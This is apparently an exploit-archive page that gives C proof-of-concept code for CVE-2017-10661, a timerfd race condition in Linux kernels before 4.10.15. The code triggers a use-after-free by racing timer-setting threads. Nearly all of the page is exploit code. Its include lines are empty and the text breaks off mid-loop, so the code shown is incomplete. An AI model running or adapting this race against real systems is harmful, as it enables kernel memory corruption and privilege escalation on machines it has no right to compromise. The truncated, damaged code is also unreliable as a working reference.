Linux kernel < 4.10.15 - Race Condition Privilege Escalation

Properties

Published:
19.12.2017
Target:
Linux kernel < 4.10.15

Code

/*
 * PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10
 */
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define RACE_TIME 1000000
int fd;
int fd_dumb;
int count=0;
 
 
void* list_add_thread(void* arg){
 
    int ret;
 
    struct itimerspec new ={
        .it_interval={
            .tv_sec=100,
            .tv_nsec=100
        },
        .it_value={
            .tv_sec=100,
            .tv_nsec=100
        }
    };
 
    int i=0;
    while(i<1){
 
        ret=timerfd_settime(fd,3,&new,NULL);
 
        if(ret<0){
            perror("timerfd settime failed !");
        }
        i++;
    }
 
 
    return NULL;
}
 
void* list_del_thread(void* arg){
 
    int ret;
 
    struct itimerspec new ={
        .it_interval={
            .tv_sec=100,
            .tv_nsec=100
        },
        .it_value={
            .tv_sec=100,
            .tv_nsec=100
        }
    };
 
    int i=0;
    while(i<1){
        ret=timerfd_settime(fd,1,&new,NULL);
 
        if(ret<0){
            perror("timerfd settime failed !");
        }
        i++;
    }
    return NULL;
 
}
 
int post_race()
{
    int ret;
 
    struct itimerspec new ={
        .it_interval={
            .tv_sec=100,
            .tv_nsec=100
        },
        .it_value={
            .tv_sec=100,
            .tv_nsec=100
        }
    };
 
    int i=0;
 
    struct timeval tv={
        .tv_sec = 120+count*2,
        .tv_usec = 100
    };
    ret=settimeofday(&tv,NULL);
    if(ret<0){
        perror("settimeofday");
    }
    return 0;
}
 
int do_race(){
    int ret_add[2];
    int i;
    int j;
    pthread_t th[2]={0};
 
    i=0;
    while(i